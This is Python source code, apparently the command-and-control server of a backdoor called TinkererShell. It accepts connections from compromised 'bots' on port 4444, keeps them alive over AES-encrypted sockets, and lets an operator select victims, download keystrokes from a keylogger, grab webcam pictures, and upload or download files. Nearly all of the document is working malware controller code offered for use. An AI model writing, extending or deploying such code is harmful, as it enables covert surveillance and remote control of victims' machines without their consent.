def handler(new_so, new_port, username): """Keep-alive the connected bots.\n""" global connected_sockets new_so.listen(10) conn_handler, addr = new_so.accept() lengthcrypt = conn_handler.recv(1024) expected_length = int(decode_aes(lengthcrypt)) encrypted_received_data: str = '' while len(encrypted_received_data) < expected_length: encrypted_received_data += conn_handler.recv(1024).decode('utf-8') a = decode_aes(encrypted_received_data) if a == username: logging(data_to_log=('Connection consolidated with: {}\t{}'.format(str(addr).split('\'')[1], username)), printer=True) connected_sockets.append( {'conn': conn_handler, 'port': new_port, 'ip': str(addr).split('\'')[1], 'username': username, 'status': True}) position = len(connected_sockets) - 1 while True: if position != active_bot: encrypted = encode_aes('KeepAlive') # Send encrypted data's length encrypted conn_handler.send(bytes(encode_aes(str(len(encrypted))), 'utf-8')) # Sleep 1 second to let the receiver decrypt the length packet. sleep(1) # Send encrypted data conn_handler.send(bytes(encrypted, 'utf-8')) sleep(60) if thr_exit.isSet(): break conn_handler.close()
def default(self, command): if command != 'SHquit' and command != 'SHkill': sender(command) response = receiver() if response == 'reachedexcept': receiver(printer=True) else: logging(data_to_log=response, printer=True)
def receiver(printer=False) -> str: """Receive encrypted data and return clear-text string.\n""" lengthcrypt = conn.recv(1024).decode('utf-8') expected_length = int(decode_aes(lengthcrypt)) encrypted_received_data: str = '' while len(encrypted_received_data) < expected_length: encrypted_received_data += conn.recv(1024).decode('utf-8') clear_text = decode_aes(encrypted_received_data) if printer is True: logging(data_to_log=clear_text, printer=True) return clear_text
def ask_input(phrase: object = False, send: bool = False) -> str: """Ask for user input with custom phrase or default to >>>. If needed send input to connected bot.\n""" if phrase: user_input = input(phrase) logging(data_to_log=(''.join((phrase, user_input)))) if send is True: sender(user_input) else: user_input = input('>>> ') logging(data_to_log=('>>> ' + user_input)) if send is True: sender(user_input) return user_input
def do_SHbots(self, option): """SHbots [option]\n\tlist: List connected bots\n\t[bot number]: Interact with target bot\n""" global active_bot global conn if option: if option == 'list': active_bots_str = '\nActive bots:' inactive_bots_str = '\n\nInactive bots:' for bots_counter, bot in enumerate(connected_sockets): if bot['status'] is True: active_bots_str += '\n\tBot # {}\t\t{}\t{}'.format(bots_counter, bot['ip'], bot['username']) else: inactive_bots_str += '\n\tBot # {}\t\t{}\t{}'.format(bots_counter, bot['ip'], bot['username']) printable_bots = active_bots_str + inactive_bots_str + '\n\n\nYou can interact with a bot using "SHbots [bot-number]"\n' logging(data_to_log=printable_bots, printer=True) elif option.isdigit() is True: try: if connected_sockets[int(option)]['status'] is True: double_check = ask_input(phrase='Are you sure? yes/no\n') if double_check == 'yes': active_bot = int(option) conn = connected_sockets[int(option)]['conn'] tinkerer_menu() else: logging(data_to_log='Selection canceled\n', printer=True) except Exception as exception_default: if str(exception_default) == 'list index out of range': logging(data_to_log='The selected bot does not exist\n', printer=True) else: logging(data_to_log=str(exception_default), printer=True) else: print('Aborted: unknown option\n') else: print('Aborted: an option is required\n')
def kill_current_bot() -> bool: # noinspection PyPep8 """Terminate remote backdoor thread.\n""" global connected_sockets double_check = ask_input(phrase='Are you sure? yes/no\n') if double_check == 'yes': sender('SHkill') response = receiver() if response != 'mistochiudendo': logging(data_to_log=response, printer=True) connected_sockets[active_bot]['status'] = False return True logging(data_to_log='Operation aborted\n', printer=True) return False
def keylogdownloader(): """Download keystrokes logged by keylogger.\n""" sender('SHkeylogdownload') keylogged_data = receiver() local_filename = 'keylogged-{}-{}.txt'.format(connected_sockets[active_bot]['ip'], connected_sockets[active_bot]['username']) if keylogged_data == 'reachedexcept': receiver(printer=True) else: try: keylogged_descriptor = open(local_filename, 'a') keylogged_descriptor.write(keylogged_data) keylogged_descriptor.close() logging(data_to_log='Download completed!\n Use <SHkeylog show> to see keylogged data\n', printer=True) except Exception as exception_keylogdownloader: logging(data_to_log=str(exception_keylogdownloader), printer=True)
def uploader() -> bool: """Upload a file to the bot.\n""" sender('SHupload') file_to_upload = ask_input(phrase=('Insert the name of the file that you want to upload\t\t' + os.path.normcase( 'C:/boot.ini') + '\n\n >>> ')) ask_input(phrase='Insert name which you want to use to save the file\t\tC:\\boot.ini\n\n >>> ', send=True) try: upload_descriptor = open(file_to_upload, 'rb') file_data = upload_descriptor.read() upload_descriptor.close() except Exception as exception_uploader: logging(data_to_log=str(exception_uploader), printer=True) file_data = 'reachedexcept' sender(file_data.decode('utf-8')) receiver(printer=True) return True
def keylogshower(): """Show downloaded keystrokes in a tk window.\n""" local_filename = 'keylogged-{}-{}.txt'.format(connected_sockets[active_bot]['ip'], connected_sockets[active_bot]['username']) try: keylogged_descriptor = open(local_filename, 'r') print(keylogged_descriptor.read()) keylogged_descriptor.close() except IOError as exception_keylogshower: if exception_keylogshower.errno == 2: # noinspection PyPep8 logging( data_to_log='It looks like you never downloaded keylogged data from bot!\n Going to download it now for you...\n', printer=True) keylogdownloader() keylogshower() else: logging(data_to_log=str(exception_keylogshower), printer=True)
def webcam_pic() -> bool: """Take a full screen screenshot from the bot.\n""" sender('SHwebcampic') received_file_data = b64decode(receiver()) if received_file_data != 'reachedexcept': counter = 0 while True: local_filename = 'webcam-pic-{}-{}-{}.png'.format(connected_sockets[active_bot]['ip'], connected_sockets[active_bot]['username'], str(counter)) if not os.path.isfile(local_filename): break counter += 1 try: downloaded_file_descriptor = open(local_filename, 'wb') downloaded_file_descriptor.write(received_file_data) downloaded_file_descriptor.close() logging(data_to_log=('Screenshot saved as ' + local_filename + '\n'), printer=True) except Exception as exception_downloader: logging(data_to_log=str(exception_downloader), printer=True) else: remote_exception = receiver() logging( data_to_log='Operation aborted (received <reachedexcept> string from bot)\nDetails: ' + remote_exception, printer=True) return True
def downloader() -> bool: """Download a file from the bot.\n""" sender('SHdownload') # File to be downloaded receiver(printer=True) ask_input(send=True) received_file_data = receiver() # Local filename to save downloaded file local_filename = ask_input( phrase= 'Insert name which you want to use to save the file\t\texample.txt\n\n >>> ' ) # sender(a) if received_file_data != 'reachedexcept': try: downloaded_file_descriptor = open(local_filename, 'wb') downloaded_file_descriptor.write(bytes(received_file_data, 'utf-8')) downloaded_file_descriptor.close() logging(data_to_log=('File saved in ' + os.getcwd() + '\n'), printer=True) except Exception as exception_downloader: logging(data_to_log=str(exception_downloader), printer=True) else: remote_exception = receiver() logging( data_to_log= 'Operation aborted (received <reachedexcept> string from bot)\nDetails: ' + remote_exception, printer=True) return True
def connection_gate(): """Thread that keep accepting new bots, assigning ports, and passing them to other threads doing keep-alive.\n""" host = '' port = 4444 # Socket definition s = socket(AF_INET, SOCK_STREAM) s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) s.bind((host, port)) logging(data_to_log='\nWelcome in TinkererShell!\nWritten By 4n4nk3: https://github.com/4n4nk3\n', printer=True) logging(data_to_log=('Listening on 0.0.0.0:%s...' % str(port)), printer=True) # Listening... s.listen(10) while True: while True: so = s so.settimeout(60) try: conn_gate, addr = so.accept() break except timeout: if thr_exit.isSet(): break pass if thr_exit.isSet(): break # noinspection PyUnboundLocalVariable lengthcrypt = conn_gate.recv(1024).decode('utf-8') expected_length = int(decode_aes(lengthcrypt)) encrypted_received_data: str = '' while len(encrypted_received_data) < expected_length: encrypted_received_data += conn_gate.recv(1024).decode('utf-8') clear_text = decode_aes(encrypted_received_data) logging(data_to_log=('Connection established with: ' + str(addr).split('\'')[1]), printer=True) while True: new_port = randrange(5000, 6000) try: new_so = socket(AF_INET, SOCK_STREAM) new_so.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) new_so.bind((host, new_port)) encrypted = encode_aes(str(new_port)) # Send encrypted data's length encrypted conn_gate.send(bytes(encode_aes(str(len(encrypted))), 'utf-8')) # Sleep 1 second to let the receiver decrypt the length packet. sleep(1) # Send encrypted data conn_gate.send(bytes(encrypted, 'utf-8')) threading.Thread(target=handler, args=(new_so, new_port, clear_text)).start() break except os.error as exception_gate: if exception_gate.errno == 98: print("Port is already in use") else: print(exception_gate) if thr_exit.isSet(): break if thr_exit.isSet(): break
def quit_utility() -> bool: # noinspection PyPep8 """Ask if user wants to terminate backdoor threads in connected bots and kill them, then exits.\n""" global conn global thr_exit double_check = ask_input(phrase='Are you sure? yes/no\n') if double_check == 'yes': kill_all = ask_input( phrase='Do you want to kill all the bots? yes/no\n') for bot in connected_sockets: if bot['status'] is True: conn = bot['conn'] if kill_all == 'yes': sender('SHkill') else: sender('SHquit') response = receiver() if response != 'mistochiudendo': logging(data_to_log=response, printer=True) thr_exit.set() return True logging(data_to_log='Operation aborted\n', printer=True) return False
def precmd(self, line): logging(data_to_log=('\n(Cmd) ' + line)) return cmd.Cmd.precmd(self, line)
def do_SHreturn(self, option): """SHreturn\n\tReturn to TinkererShell bot selection mode.\n""" logging(data_to_log='Returning to TinkererShell bot selection mode...\n', printer=True) return True
def postloop(self): logging(data_to_log='\nQuitting!', printer=True)